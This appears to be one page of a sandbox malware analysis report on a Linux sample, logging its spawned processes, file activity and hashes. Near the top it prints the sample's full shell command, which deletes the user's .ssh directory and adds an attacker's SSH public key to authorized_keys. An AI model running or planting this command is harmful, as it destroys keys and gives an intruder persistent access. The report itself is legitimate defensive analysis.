Copyright Joe Security LLC 2020 Page 16 of 23 Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9 p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1 kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGm d4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

File Written

Analysis Process: sh PID: 20761 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: rm PID: 20761 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/rm Arguments: rm -rf .ssh File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f

File Activities

File Deleted

File Read

Analysis Process: sh PID: 20764 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: mkdir PID: 20764 Parent PID: 20759

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/mkdir Arguments: mkdir .ssh File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41

File Activities

File Read

Directory Created

Analysis Process: sh PID: 20771 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: chmod PID: 20771 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/chmod Arguments: chmod -R go= /home/user/.ssh File size: 56112 bytes MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f

File Activities

File Read

Directory Enumerated

Permission Modified

Analysis Process: anacron PID: 20780 Parent PID: 20758

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a

File Written

Analysis Process: upstart PID: 20811 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000

Analysis Process: sh PID: 20811 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20812 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 20812 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e

File Activities

Analysis Process: sh PID: 20813 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-checkreports Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system File size: 1269 bytes MD5 hash: 1a7d84ebc34df04e55ca3723541f48c9

File Activities

File Read

File Written

Directory Enumerated

Analysis Process: upstart PID: 20838 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000

Analysis Process: sh PID: 20838 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Read

Analysis Process: sh PID: 20839 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 20839 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 20855 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 20855 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87

File Activities

File Written

Directory Enumerated

Analysis Process: upstart PID: 20868 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000

Analysis Process: sh PID: 20868 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20869 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 20869 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e

File Read

Analysis Process: sh PID: 20870 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 20870 Parent PID: 20868

General

File Activities

File Read

Directory Enumerated